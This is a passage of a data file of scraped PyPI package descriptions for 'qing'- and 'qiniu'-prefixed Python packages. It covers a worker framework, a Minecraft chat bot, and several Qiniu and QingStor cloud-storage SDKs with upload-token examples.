normalizer_worker.pyfrom qing_framework import QingWorkerfrom qing_framework import QingMessage as QMclass Normalizer(QingWorker):def process(self, qs):#do your magicformatted_messages = []# messages from queue named 'dummy' are loaded for you automagically inside the qs variable.while message in qs['dummy']:# Each QingMessage has a payload and now you can create your own after modifying!formatted_message = QM( payload=\"formatted: \" + message.payload )formatted_messages.append(formatted_message)#returned messages are automatically writted to output queue!return formatted_messages`````` python# normalizer_manifest.py# This file describes worker's responsibility and dependencies.{'name':'normalizer','author': 'AlSayed Gamal','version': '0.0.1','description': 'normalizes messages into proper format!','in-queues': ['dummy'],'out-queues': ['normalized'],'activity-rate': '5000','class': 'Normalizer'}```Run worker using CLI--------------------You can start qing as a server and use qing's CLI to run 
and scale the worker```bash#queen cli and UI for qing framework.qing --help # just in case you needed help.qingd # qing deamon, you will need sudo permissionqing run Normalizer # run a specific workerqing kill Normalizer --job-id=123 #kill specific worker job```Monitor the data-pipeline using Web-UI--------------------------------------```bashqing --webserver --port=8910 # you can view data pipelines, queues, jobs and workers.```"} +{"package": "qinghama", "pacakge-description": "UNKNOWN"} +{"package": "qingjie", "pacakge-description": "test test"} +{"package": "qinglan-bot", "pacakge-description": "\u9752\u5c9aBot\u57fa\u4e8eNoneBot\u7684\u4e0eMinecraft Server\u4e92\u901a\u6d88\u606f\u7684\u673a\u5668\u4eba\u4ecb\u7ecd\u547d\u540d\u7684\u7075\u611f\u6765\u81ea\u4e8e\u6211\u7684\u4e00\u4f4d\u670b\u53cb\u5728\u539f\u63d2\u4ef6\u4e0a\u52a0\u5165\u4e86\u52a8\u6001\u914d\u7f6e\u7684\u529f\u80fd\u6570\u636e\u5e93\u53c2\u8003HarukaBot\u5b89\u88c5\u6587\u6863\uff1a\u4ecd\u5728\u66f4\u65b0\u7684\u9752\u5c9aBot\u6587\u6863NoneBot2pip install qinglan-bot\u7a7a\u76ee\u5f55\u4e0b\u4f7f\u7528\u547d\u4ee4ql runMineCraft Server\u524d\u5f80\u63d2\u4ef6Releases\u4e0b\u8f7d\u5bf9\u5e94\u670d\u52a1\u7aef\u7684jar\u6587\u4ef6\u5e76\u5b89\u88c5jar\u5b89\u88c5\u6587\u6863\u53ef\u53c2\u8003MC_QQ\u547d\u4ee4\u5e2e\u52a9\u4e3a\u9632\u6b62\u4e0e\u5176\u4ed6\u63d2\u4ef6\u51b2\u7a81\u8bf7\u4f7f\u7528ql\u5e2e\u52a9\u6765\u83b7\u53d6\u5e2e\u52a9\u83b7\u53d6\u5df2\u8fde\u63a5\u81f3 WebSocket \u7684 MineCraft\u670d\u52a1\u5668\u670d\u52a1\u5668\u5217\u8868\u52a8\u6001\u63a7\u5236\u9700\u8981\u4e92\u901a\u7684\u7fa4\u804a\u5f00\u542f\u4e92\u901a Server1\u5f00\u542f\u4e92\u901a Server2\u5173\u95ed\u4e92\u901a Server1\u5173\u95ed\u4e92\u901a Server2\u83b7\u53d6\u5f53\u524d\u7fa4\u804a\u5f00\u542f\u4e92\u901a\u7684\u670d\u52a1\u5668\u4e92\u901a\u5217\u8868\u4e3a\u5f53\u524d\u7fa4\u804a\u8bbe\u7f6e\u662f\u5426\u5728\u53d1\u9001\u6d88\u606f\u5230MC\u65f6\u643a\u5e26\u7fa4\u804a\u540d\u79f0\u5f00\u542f\u53d1\u9001\u7fa4\u540d\u5173\u95ed\u53d1\u9001\u7fa4\u540d\u670d\u52a1\u5668\u5728\u53d1\u9001\u6d88\u606f\u81f3\u7fa4\u804a\u65f6\uff0c\u662f\u5426\u643a\u5e26\u670d\u52a1\u5668\u540d\u5f00\u542f\u670d\u52a1\u5668\u540d\u5173\u95ed\u670d\u52a1\u5668\u540d\u670d\u52a1\u5668\u662f\u5426\u542f\u7528Rcon\u6765\u53d1\u9001\u6d88\u606f\u6216\u547d\u4ee4Rcon\u53d1\u9001 \u6d88\u606f\u548c\u547d\u4ee4 \u9002\u7528\u4e8e\u975e\u63d2\u4ef6\u7aef\u670d\u52a1\u5668Rcon\u53d1\u9001\u547d\u4ee4\u9002\u7528\u4e8e\u7eaf\u63d2\u4ef6\u7aef\u5f00\u542frcon\u6d88\u606f \u670d\u52a1\u5668\u540d\u4e28\u5173\u95edrcon\u6d88\u606f \u670d\u52a1\u5668\u540d\u5f00\u542frcon\u547d\u4ee4 \u670d\u52a1\u5668\u540d\u4e28\u5173\u95edrcon\u547d\u4ee4 \u670d\u52a1\u5668\u540d\u4fee\u6539\u670d\u52a1\u5668Rcon\u8fde\u63a5\u4fe1\u606f\u7684IP\u3001\u7aef\u53e3\u3001\u5bc6\u7801\u4e3a\u4fdd\u969c\u5b89\u5168\uff0c\u4ec5\u9650\u8d85\u7ea7\u7528\u6237\u4e0eBot\u79c1\u804a\u4f7f\u7528\u4e3a\u4fdd\u969c\u5b89\u5168\uff0c\u82e5rcon\u5bc6\u7801\u4e3a\u9ed8\u8ba4\u5bc6\u7801\uff0c\u5c06\u4e0d\u4f1a\u8fde\u63a5\u670d\u52a1\u5668\u7684Rcon\u4fee\u6539rconip \u670d\u52a1\u5668\u540d \u65b0ip\u4fee\u6539rcon\u7aef\u53e3 \u670d\u52a1\u5668 \u65b0\u7aef\u53e3\u4fee\u6539rcon\u5bc6\u7801 \u670d\u52a1\u5668 \u65b0\u5bc6\u7801\u67e5\u770b\u6570\u636e\u5e93\u4e2d\u670d\u52a1\u5668\u5217\u8868\u670d\u52a1\u5668\u5217\u8868\u67e5\u770b\u5df2\u7ecf\u8fde\u63a5\u81f3 WebSocket 
\u7684\u670d\u52a1\u5668\u5217\u8868\u5df2\u8fde\u63a5\u670d\u52a1\u5668\u5217\u8868\u7279\u522b\u611f\u8c22@SK-415\uff1a\u611f\u8c22SK\u4f6c\u7ed9\u4e88\u8bb8\u591a\u4f18\u79c0\u7684\u5efa\u8bae\u548c\u8010\u5fc3\u7684\u89e3\u7b54\u3002@zhz-\u7ea2\u77f3\u5934\uff1a\u611f\u8c22\u7ea2\u77f3\u5934\u5728\u4ee3\u7801\u4e0a\u7684\u5e2e\u52a9SK-415/HarukaBot\uff1a\u611f\u8c22HarukaBot\u5982\u6b64\u4f18\u96c5\u7684\u5404\u7c7b\u65b9\u6cd5NoneBot2\uff1a \u63d2\u4ef6\u4f7f\u7528\u7684\u5f00\u53d1\u6846\u67b6\u3002go-cqhttp\uff1a \u7a33\u5b9a\u5b8c\u5584\u7684 CQHTTP \u5b9e\u73b0\u3002\u8d21\u732e\u4e0e\u652f\u6301\u89c9\u5f97\u597d\u7528\u53ef\u4ee5\u7ed9\u8fd9\u4e2a\u9879\u76ee\u70b9\u4e2aStar\u6216\u8005\u53bb\u7231\u53d1\u7535\u6295\u5582\u6211\u3002\u6709\u610f\u89c1\u6216\u8005\u5efa\u8bae\u4e5f\u6b22\u8fce\u63d0\u4ea4Issues\u548cPull requests\u3002\u8bb8\u53ef\u8bc1\u672c\u9879\u76ee\u4f7f\u7528GNU AGPLv3\u4f5c\u4e3a\u5f00\u6e90\u8bb8\u53ef\u8bc1\u3002"} +{"package": "qinglongapi", "pacakge-description": "qinglongapi\u9752\u9f99api\u7684python SDK\u5177\u4f53\u6587\u6863https://yuxian158.github.io/qinglong-api/\u4f7f\u7528\u65b9\u6cd5\u5b89\u88c5pip install qinglongapi\u6240\u6709\u6a21\u5757\u4f7f\u7528\u65b9\u6cd5\u5927\u540c\u5c0f\u5f02\uff0c\u4ee5\u73af\u5883\u53d8\u91cf\u6a21\u5757\u4e3a\u4f8b:from qlapi import qlenv\n\nql_env = qlenv(\n url=\"12.22.43.23\", #\u9752\u9f99\u9762\u677fIP\u5730\u5740(\u4e0d\u5305\u542bhttp://)\n port=5700,\t\t\t#\u9752\u9f99\u9762\u677f\u7aef\u53e3\n client_id=\"admin\", # \u9752\u9f99\u9762\u677fopenapi\u767b\u5f55\u7528\u6237\u540d\n client_secret=\"abcdefg_\", # \u9752\u9f99\u9762\u677fopenapi\u767b\u5f55\u5bc6\u7801\n)\nql_env.list()\u9752\u9f99api\u6587\u6863https://qinglong.ukenn.top/#/\u5f88\u591a\u8fd8\u6ca1\u6709\u5b8c\u5584\uff0c\u6b22\u8fcepr"} +{"package": "qinglu0330-hello", "pacakge-description": "No description available on PyPI."} +{"package": "qingmi", "pacakge-description": "Qingmi(\u9752\u54aa\uff0c \u53d6\u81ea\u60c5\u8ff7\u8c10\u97f3\uff0c \u6709\u4eb2\u6635\u4e4b\u610f)\u662f\u4e00\u4e2a\u57fa\u4e8ePython3+Flask\u4e8c\u6b21\u5f00\u53d1\u7684\u5e94\u7528\u5c42\u6846\u67b6\uff0c \u5176\u5185\u90e8\u5c01\u88c5\u4e86\u5e38\u7528\u7684\u6a21\u5757\u548c\u5de5\u5177\u96c6\uff0c \u4e3b\u8981\u7528\u4e8e\u9488\u5bf9flask web\u5feb\u901f\u9ad8\u6548\u5f00\u53d1\u3002\u91c7\u7528\u7684\u6280\u672f\u6808\uff1apython3flaskWerkzeugmongoengineceleryfabrichttpieFlask-ScriptFlask-WTFflask-mongoengineFlask-LoginFlask-RESTfulFlask-DebugToolbarFlask-Celery-HelperrequestsFlask-CachingFlask-AdminFlask-UploadsipythonPillowclick\u529f\u80fd\u7279\u6027\uff1a\u6570\u636e\u7edf\u8ba1\u77ed\u4fe1\u53d1\u9001\u90ae\u4ef6\u53d1\u9001\u6587\u4ef6\u4e0a\u4f20\u9a8c\u8bc1\u7801\u9759\u6001\u6587\u4ef6IP\u5904\u7406\u65e5\u5fd7\u901a\u7528\u6a21\u5757\u7528\u6237\u6a21\u5757\u6743\u9650\u7ba1\u7406\u52a8\u6001\u914d\u7f6e\u5b9a\u65f6\u4efb\u52a1(\u4efb\u52a1\u8c03\u5ea6)\u901a\u7528API\u7b2c\u4e09\u65b9\u767b\u5f55\u5fae\u4fe1\u516c\u4f17\u5e73\u53f0\u90e8\u7f72\u8f85\u52a9\u5de5\u5177helper(\u52a0\u89e3\u5bc6[hash/md5]/json/http/ip/\u65e5\u5fd7/\u6b63\u5219\u8868\u8fbe\u5f0f/\u65f6\u95f4\u548c\u65e5\u671f/\u2026)\u5355\u5143\u6d4b\u8bd5\u7528\u6cd5\u6587\u6863"} +{"package": "qingping-ble", "pacakge-description": "Qingping BLEQingping BLE supportInstallationInstall this via pip (or your favourite package manager):pip install qingping-bleContributors \u2728Thanks goes to these wonderful people (emoji key):This project follows theall-contributorsspecification. 
Contributions of any kind welcome!CreditsThis package was created withCookiecutterand thebrowniebroke/cookiecutter-pypackageproject template."} +{"package": "qingpi-python", "pacakge-description": "qingpi-pythonPython library for Qingpi.$pipinstallqingpi-pythonqingpictlGUI application to control Qingpi with transparent Window and Citra compatible keyboard operation.Currently, only Windows version is available.Run$qingpictl[port]or$python-mqingpi[port]or using pre-built binary> qingpictl.exe [port]You may create batch file like this if you don't want to specify the port from the command line every time.STARTqingpictl.exe COM6Input mappingButtonControlInputAABSXZYXLQRWZL1ZR2STARTMSELECTNHOMEBPOWERVWIRELESSPHatControlInputUPTRIGHTHDOWNGLEFTFSlidePadControlInputUPRIGHTDOWNLEFTCircle Pad Pro(not implemented)ControlInputUPIRIGHTLDOWNKLEFTJHotkeysControlInputExpand window+Shrink window-Developer note$poetryrunpython-mqingpi[port]--debugThe build script requires PyInstaller and ImageMagick.$poetryrunpython-mpipinstallpyinstaller$makePyInstaller is not included in the dev group because PyInstaller has a narrower Python version specification than necessary (e.g. v6.3.0 requires \"<3.13,>=3.8\"), which affects version reqirements of qingpi-python.To avoid security issues,$poetryrunpython-mpipuninstallpyinstaller$gitclonehttps://github.com/pyinstaller/pyinstaller--depth1$cd.\\pyinstaller\\bootloader\\$py.\\wafdistcleanall$cd..\\..\\$poetryrunpython-mpipinstall.\\pyinstaller\\"} +{"package": "qingqiu", "pacakge-description": "\u7b80\u5355\u5f97\u63a5\u53e3\u6d4b\u8bd5\u6846\u67b6"} +{"package": "qingstor-sdk", "pacakge-description": "# QingStor SDK for Python[![Build Status](https://github.com/qingstor/qingstor-sdk-python/workflows/Unit%20Test/badge.svg?branch=master)](https://github.com/qingstor/qingstor-sdk-python/actions?query=workflow%3A%22Unit+Test%22)\n[![API Reference](http://img.shields.io/badge/api-reference-green.svg)](https://docs.qingcloud.com/qingstor/)\n[![License](http://img.shields.io/badge/license-apache%20v2-blue.svg)](https://github.com/yunify/qingstor-sdk-python/blob/master/LICENSE)\n[![Join the chat](https://img.shields.io/badge/chat-online-blue?style=flat&logo=zulip)](https://qingstor.zulipchat.com/join/nofzrqd5a5skt5ebnaor5b7d/)English | [\u4e2d\u6587](README_zh-CN.md)The official QingStor SDK for the Python programming language.Before you start using the SDK, make sure you have a basic understanding of the concepts of [QingStor object storage](https://docs.qingcloud.com/qingstor/api/common/overview.html) (such as Zone, Service, Bucket, Object, etc.).This SDK try to keep a one-to-one correspondence with the methods on the [QingCloud QingStor object storage documentation](https://docs.qingcloud.com/qingstor/api/). For details of each method, please refer to the corresponding chapter in the link.## Quick StartNow you are ready to code. 
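(As a rough, non-authoritative sketch of what that first bit of code tends to look like: the module paths and method names below are recalled from the SDK's own quick-start material rather than taken from this page, so treat them as assumptions and prefer the linked guides below.)

from qingstor.sdk.config import Config
from qingstor.sdk.service.qingstor import QingStor

# The access key pair comes from the QingCloud console; placeholders here.
config = Config("ACCESS_KEY_ID", "SECRET_ACCESS_KEY")
qingstor = QingStor(config)

# List the buckets visible to this key pair.
output = qingstor.list_buckets()
print(output.status_code)

# Work with one bucket in a given zone, e.g. 'pek3a', and list its objects.
bucket = qingstor.Bucket("your-bucket-name", "pek3a")
output = bucket.list_objects()
print(output.status_code)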
You can read the detailed guides in the list below to have a clear understanding.[Preparation](./docs/prepare.md)[Installation](./docs/install.md)[Configuration](./docs/config.md)[Service Initialization](./docs/service.md)[Code Examples](./docs/examples.md)Checkout our [releases](https://github.com/yunify/qingstor-sdk-python/releases) and [change log](./CHANGELOG.md) for information about the latest features, bug fixes and new ideas.## Reference Documentations[QingStor Documentation](https://docs.qingcloud.com/qingstor/index.html)[QingStor Guide](https://docs.qingcloud.com/qingstor/guide/index.html)[QingStor APIs](https://docs.qingcloud.com/qingstor/api/index.html)## ContributingPlease see [Contributing Guidelines](./CONTRIBUTING.md) of this project before submitting patches.## LICENSEThe Apache License (Version 2.0, January 2004)."} +{"package": "qingtest", "pacakge-description": "Example PackageThis is a simple example package."} +{"package": "qingxun-openapi-python-sdk", "pacakge-description": "No description available on PyPI."} +{"package": "qiniu", "pacakge-description": "see:https://github.com/qiniu/python-sdk"} +{"package": "qiniu4blog", "pacakge-description": "\u5199\u535a\u5ba2\u7528\u7684\u4e03\u725b\u56fe\u5e8a"} +{"package": "qiniu4blog-mk", "pacakge-description": "The author of the origin version of this package is wzyuliyang, the current version is modified by mirsking"} +{"package": "qiniu-async", "pacakge-description": "\u5b89\u88c5\u901a\u8fc7pip$pipinstallqiniu-async\u4f7f\u7528\u65b9\u6cd5\u4e0a\u4f20importasyncioimportqiniu_asyncq=qiniu_async.Qiniu(access_key,access_secret)token=q.upload_token(bucketname)# \u6587\u4ef6\u6d41\u4e0a\u4f20asyncio.run(q.upload_data(token,\"333.txt\",\"123\u6d4b\u8bd5\"))# \u6587\u4ef6\u5730\u5740\u4e0a\u4f20asyncio.run(q.upload_file(token,\"mypic0.jpeg\",\"/Users/liuyue/Downloads/mypic0.jpeg\"))### \u5f02\u6b65\u6846\u67b6\u63a5\u5165#### Tornado```pythonimportqiniu_asyncasyncdefpost(self):file=self.request.files['file']formetainfile:filename=meta['filename']q=qiniu_async.Qiniu(access_key,access_secret)token=q.upload_token(bucketname)awaitq.upload_data(token,filename,meta['body'])returnself.write('Your file has been uploaded')"} +{"package": "qiniu-cli", "pacakge-description": "qiniu-cliQiniu CLI tool.Installpip install qiniu-cliUsage$ qiniu_cli upload requirements.txt\nhttp://tmp-images.qiniudn.com/requirements.txt\n\n$ qiniu_cli upload --save-dir \"comics/2014/\" *.png *.txt\nhttp://tmp-images.qiniudn.com/comics/2014/2014-09-25-EveryFall.zh-cn.png\nhttp://tmp-images.qiniudn.com/comics/2014/3014.painting.png\nhttp://tmp-images.qiniudn.com/comics/2014/requirements.txt\n\n\n$ qiniu_cli --help\nUsage: qiniu_cli [OPTIONS] COMMAND [ARGS]...\n\nOptions:\n -c, --config FILENAME Config file(default: config.json).\n --bucket TEXT Bucket name.\n -v, --verbose Enables verbose mode.\n --version Show the version and exit.\n --help Show this message and exit.\n\nCommands:\n search Search file.\n upload Upload file.\n\n$ qiniu_cli upload --help\nUsage: qiniu_cli upload [OPTIONS] FILES...\n\nOptions:\n --save-name TEXT File save name.\n --save-dir TEXT Upload to directory.\n --auto-name Auto name file by sh1 hex digest with timestamp.\n --help Show this message and exit.Changelog0.1.0 (2014-10-12)Initial Release"} +{"package": "qiniu-django-backend", "pacakge-description": "qiniu_django_backend"} +{"package": "qiniuFolderSync", "pacakge-description": "No description available on PyPI."} +{"package": "qiniufops", "pacakge-description": "# 
Qiniufops
------
Qiniu bucket image persistent operations
> * `qiniufops.cfg` Configure file, in /etc/qiniu/
> * `qiniufops` python scripts, in /usr/local/bin/
------
## Usage
### set qiniufops.cfg configure file, then run qiniufops.
```conf
[qiniu]
`accesskey:` Your qiniu access key
`secretkey:` Your qiniu access secret key
`bucket:` Qiniu bucket name

[fops]
One or more image style, name:style, one per line. Example:
`stylename1:style1`
`stylename2:style2`
`!qsmalllow:imageView2/1/w/320/h/320/q/60`
```"}
+{"package": "qiniufs", "pacakge-description": "Install: pip install qiniufs. Usage:
# init
bucket_name = \"your-qiniu-bucket-name\"
prefix_url = \"your-qiniu-domain\"
fs = QiniuFS(bucket_name, access_key, secret_key, prefix_url)
# upload
mime = data.mimetype
r, d = fs.upload_data(data, mime=mime)
if r and d:
    key = d.get('key')
    url = fs.get_url(d.get('key'))
# delete
r = fs.delete_file(key)
if r:
    print \"success\"
Links: github"}
+{"package": "qiniu-lite", "pacakge-description": "# coding:utf-8
import tornado.ioloop
import tornado.web
from qiniu_lite import Cow

cow = Cow('access key', 'secret key')
policy = cow.get_put_policy('bucket name')

class MainHandler(tornado.web.RequestHandler):
    def get(self):
        self.write('''
''' % policy.token())if __name__ == \"__main__\":application = tornado.web.Application([(r\"/\", MainHandler),])application.listen(8888)tornado.ioloop.IOLoop.instance().start()"} +{"package": "qiniuManager", "pacakge-description": "UNKNOWN"} +{"package": "qiniu-sdk-alpha", "pacakge-description": "Qiniu Resource Storage Binding SDK for Python\u6982\u8981Qiniu SDK for Python \u5305\u542b\u4ee5\u4e0b\u7279\u6027\uff1a\u901a\u8fc7\u63d0\u4f9b\u591a\u4e2a\u4e0d\u540c\u7684 Module\uff0c\u4e3a\u4e0d\u540c\u5c42\u6b21\u7684\u5f00\u53d1\u90fd\u63d0\u4f9b\u4e86\u65b9\u4fbf\u6613\u7528\u7684\u7f16\u7a0b\u63a5\u53e3\u3002\u540c\u65f6\u63d0\u4f9b\u963b\u585e IO \u63a5\u53e3\u548c\u57fa\u4e8e Async/Await \u7684\u5f02\u6b65 IO \u63a5\u53e3\u3002\u7528 PyO3 \u5c01\u88c5 Rust \u4ee3\u7801\u3002\u4ee3\u7801\u793a\u4f8b\u5ba2\u6237\u7aef\u4e0a\u4f20\u51ed\u8bc1\u5ba2\u6237\u7aef\uff08\u79fb\u52a8\u7aef\u6216\u8005Web\u7aef\uff09\u4e0a\u4f20\u6587\u4ef6\u7684\u65f6\u5019\uff0c\u9700\u8981\u4ece\u5ba2\u6237\u81ea\u5df1\u7684\u4e1a\u52a1\u670d\u52a1\u5668\u83b7\u53d6\u4e0a\u4f20\u51ed\u8bc1\uff0c\u800c\u8fd9\u4e9b\u4e0a\u4f20\u51ed\u8bc1\u662f\u901a\u8fc7\u670d\u52a1\u7aef\u7684 SDK \u6765\u751f\u6210\u7684\uff0c\u7136\u540e\u901a\u8fc7\u5ba2\u6237\u81ea\u5df1\u7684\u4e1a\u52a1API\u5206\u53d1\u7ed9\u5ba2\u6237\u7aef\u4f7f\u7528\u3002\u6839\u636e\u4e0a\u4f20\u7684\u4e1a\u52a1\u9700\u6c42\u4e0d\u540c\uff0c\u4e03\u725b\u4e91 Python SDK \u652f\u6301\u4e30\u5bcc\u7684\u4e0a\u4f20\u51ed\u8bc1\u751f\u6210\u65b9\u5f0f\u3002\u7b80\u5355\u4e0a\u4f20\u7684\u51ed\u8bc1\u6700\u7b80\u5355\u7684\u4e0a\u4f20\u51ed\u8bc1\u53ea\u9700\u8981access key\uff0csecret key\u548cbucket\u5c31\u53ef\u4ee5\u3002fromqiniu_sdk_alphaimportupload_token,credentialaccess_key='access key'secret_key='secret key'bucket_name='bucket name'cred=credential.Credential(access_key,secret_key)upload_token=upload_token.UploadPolicy.new_for_bucket(bucket_name,3600).build().to_upload_token_provider(cred)print(upload_token)\u8986\u76d6\u4e0a\u4f20\u7684\u51ed\u8bc1\u8986\u76d6\u4e0a\u4f20\u9664\u4e86\u9700\u8981\u7b80\u5355\u4e0a\u4f20\u6240\u9700\u8981\u7684\u4fe1\u606f\u4e4b\u5916\uff0c\u8fd8\u9700\u8981\u60f3\u8fdb\u884c\u8986\u76d6\u7684\u5bf9\u8c61\u540d\u79f0object name\uff0c\u8fd9\u4e2a\u5bf9\u8c61\u540d\u79f0\u540c\u65f6\u662f\u5ba2\u6237\u7aef\u4e0a\u4f20\u4ee3\u7801\u4e2d\u6307\u5b9a\u7684\u5bf9\u8c61\u540d\u79f0\uff0c\u4e24\u8005\u5fc5\u987b\u4e00\u81f4\u3002fromqiniu_sdk_alphaimportupload_token,credentialaccess_key='access key'secret_key='secret key'bucket_name='bucket name'object_name='object name'cred=credential.Credential(access_key,secret_key)upload_token=upload_token.UploadPolicy.new_for_object(bucket_name,object_name,3600).build().to_upload_token_provider(cred)print(upload_token)#### \u81ea\u5b9a\u4e49\u4e0a\u4f20\u56de\u590d\u7684\u51ed\u8bc1\u9ed8\u8ba4\u60c5\u51b5\u4e0b\uff0c\u6587\u4ef6\u4e0a\u4f20\u5230\u4e03\u725b\u4e4b\u540e\uff0c\u5728\u6ca1\u6709\u8bbe\u7f6e`returnBody`\u6216\u8005\u56de\u8c03\u76f8\u5173\u7684\u53c2\u6570\u60c5\u51b5\u4e0b\uff0c\u4e03\u725b\u8fd4\u56de\u7ed9\u4e0a\u4f20\u7aef\u7684\u56de\u590d\u683c\u5f0f\u4e3a`hash`\u548c`key`\uff0c\u4f8b\u5982\uff1a```json{\"hash\":\"Ftgm-CkWePC9fzMBTRNmPMhGBcSV\",\"key\":\"qiniu.jpg\"}\u6709\u65f6\u5019\u6211\u4eec\u5e0c\u671b\u80fd\u81ea\u5b9a\u4e49\u8fd9\u4e2a\u8fd4\u56de\u7684 JSON 
\u683c\u5f0f\u7684\u5185\u5bb9\uff0c\u53ef\u4ee5\u901a\u8fc7\u8bbe\u7f6ereturnBody\u53c2\u6570\u6765\u5b9e\u73b0\uff0c\u5728returnBody\u4e2d\uff0c\u6211\u4eec\u53ef\u4ee5\u4f7f\u7528\u4e03\u725b\u652f\u6301\u7684\u9b54\u6cd5\u53d8\u91cf\u548c\u81ea\u5b9a\u4e49\u53d8\u91cf\u3002fromqiniu_sdk_alphaimportupload_token,credentialaccess_key='access key'secret_key='secret key'bucket_name='bucket name'object_name='object name'cred=credential.Credential(access_key,secret_key)upload_token=upload_token.UploadPolicy.new_for_object(bucket_name,object_name,3600,returnBody='{\"key\":\"$(key)\",\"hash\":\"$(etag)\",\"bucket\":\"$(bucket)\",\"fsize\":$(fsize)}').build().to_upload_token_provider(cred)print(upload_token)\u5219\u6587\u4ef6\u4e0a\u4f20\u5230\u4e03\u725b\u4e4b\u540e\uff0c\u6536\u5230\u7684\u56de\u590d\u5185\u5bb9\u5982\u4e0b\uff1a{\"key\":\"qiniu.jpg\",\"hash\":\"Ftgm-CkWePC9fzMBTRNmPMhGBcSV\",\"bucket\":\"if-bc\",\"fsize\":39335}\u5e26\u56de\u8c03\u4e1a\u52a1\u670d\u52a1\u5668\u7684\u51ed\u8bc1\u4e0a\u9762\u751f\u6210\u7684\u81ea\u5b9a\u4e49\u4e0a\u4f20\u56de\u590d\u7684\u4e0a\u4f20\u51ed\u8bc1\u9002\u7528\u4e8e\u4e0a\u4f20\u7aef\uff08\u65e0\u8bba\u662f\u5ba2\u6237\u7aef\u8fd8\u662f\u670d\u52a1\u7aef\uff09\u548c\u4e03\u725b\u670d\u52a1\u5668\u4e4b\u95f4\u8fdb\u884c\u76f4\u63a5\u4ea4\u4e92\u7684\u60c5\u51b5\u4e0b\u3002\u5728\u5ba2\u6237\u7aef\u4e0a\u4f20\u7684\u573a\u666f\u4e4b\u4e0b\uff0c\u6709\u65f6\u5019\u5ba2\u6237\u7aef\u9700\u8981\u5728\u6587\u4ef6\u4e0a\u4f20\u5230\u4e03\u725b\u4e4b\u540e\uff0c\u4ece\u4e1a\u52a1\u670d\u52a1\u5668\u83b7\u53d6\u76f8\u5173\u7684\u4fe1\u606f\uff0c\u8fd9\u4e2a\u65f6\u5019\u5c31\u8981\u7528\u5230\u4e03\u725b\u7684\u4e0a\u4f20\u56de\u8c03\u53ca\u76f8\u5173\u56de\u8c03\u53c2\u6570\u7684\u8bbe\u7f6e\u3002fromqiniu_sdk_alphaimportupload_token,credentialaccess_key='access key'secret_key='secret key'bucket_name='bucket name'object_name='object name'cred=credential.Credential(access_key,secret_key)builder=upload_token.UploadPolicy.new_for_object(bucket_name,object_name,3600)builder.callback(['http://api.example.com/qiniu/upload/callback'],body='{\"key\":\"$(key)\",\"hash\":\"$(etag)\",\"bucket\":\"$(bucket)\",\"fsize\":$(fsize)}',body_type='application/json')upload_token=builder.build().to_upload_token_provider(cred)print(upload_token)\u5728\u4f7f\u7528\u4e86\u4e0a\u4f20\u56de\u8c03\u7684\u60c5\u51b5\u4e0b\uff0c\u5ba2\u6237\u7aef\u6536\u5230\u7684\u56de\u590d\u5c31\u662f\u4e1a\u52a1\u670d\u52a1\u5668\u54cd\u5e94\u4e03\u725b\u7684JSON\u683c\u5f0f\u5185\u5bb9\u3002\n\u901a\u5e38\u60c5\u51b5\u4e0b\uff0c\u6211\u4eec\u5efa\u8bae\u4f7f\u7528application/json\u683c\u5f0f\u6765\u8bbe\u7f6ecallback_body\uff0c\u4fdd\u6301\u6570\u636e\u683c\u5f0f\u7684\u7edf\u4e00\u6027\u3002\u5b9e\u9645\u60c5\u51b5\u4e0b\uff0ccallback_body\u4e5f\u652f\u6301application/x-www-form-urlencoded\u683c\u5f0f\u6765\u7ec4\u7ec7\u5185\u5bb9\uff0c\u8fd9\u4e2a\u4e3b\u8981\u770b\u4e1a\u52a1\u670d\u52a1\u5668\u5728\u63a5\u6536\u5230callback_body\u7684\u5185\u5bb9\u65f6\u5982\u4f55\u89e3\u6790\u3002\u4f8b\u5982\uff1afromqiniu_sdk_alphaimportupload_token,credentialaccess_key='access key'secret_key='secret key'bucket_name='bucket name'object_name='object 
name'cred=credential.Credential(access_key,secret_key)builder=upload_token.UploadPolicy.new_for_object(bucket_name,object_name,3600)builder.callback(['http://api.example.com/qiniu/upload/callback'],body='key=$(key)&hash=$(etag)&bucket=$(bucket)&fsize=$(fsize)')upload_token=builder.build().to_upload_token_provider(cred)print(upload_token)\u670d\u52a1\u7aef\u76f4\u4f20\u670d\u52a1\u7aef\u76f4\u4f20\u662f\u6307\u5ba2\u6237\u5229\u7528\u4e03\u725b\u670d\u52a1\u7aef SDK \u4ece\u670d\u52a1\u7aef\u76f4\u63a5\u4e0a\u4f20\u6587\u4ef6\u5230\u4e03\u725b\u4e91\uff0c\u4ea4\u4e92\u7684\u53cc\u65b9\u4e00\u822c\u90fd\u5728\u673a\u623f\u91cc\u9762\uff0c\u6240\u4ee5\u670d\u52a1\u7aef\u53ef\u4ee5\u81ea\u5df1\u751f\u6210\u4e0a\u4f20\u51ed\u8bc1\uff0c\u7136\u540e\u5229\u7528 SDK \u4e2d\u7684\u4e0a\u4f20\u903b\u8f91\u8fdb\u884c\u4e0a\u4f20\uff0c\u6700\u540e\u4ece\u4e03\u725b\u4e91\u83b7\u53d6\u4e0a\u4f20\u7684\u7ed3\u679c\uff0c\u8fd9\u4e2a\u8fc7\u7a0b\u4e2d\u7531\u4e8e\u53cc\u65b9\u90fd\u662f\u4e1a\u52a1\u670d\u52a1\u5668\uff0c\u6240\u4ee5\u5f88\u5c11\u5229\u7528\u5230\u4e0a\u4f20\u56de\u8c03\u7684\u529f\u80fd\uff0c\u800c\u662f\u76f4\u63a5\u81ea\u5b9a\u4e49returnBody\u6765\u83b7\u53d6\u81ea\u5b9a\u4e49\u7684\u56de\u590d\u5185\u5bb9\u3002\u6587\u4ef6\u4e0a\u4f20\u6700\u7b80\u5355\u7684\u5c31\u662f\u4e0a\u4f20\u672c\u5730\u6587\u4ef6\uff0c\u76f4\u63a5\u6307\u5b9a\u6587\u4ef6\u7684\u5b8c\u6574\u8def\u5f84\u5373\u53ef\u4e0a\u4f20\u3002fromqiniu_sdk_alphaimportupload,credentialaccess_key='access key'secret_key='secret key'bucket_name='bucket name'object_name='object 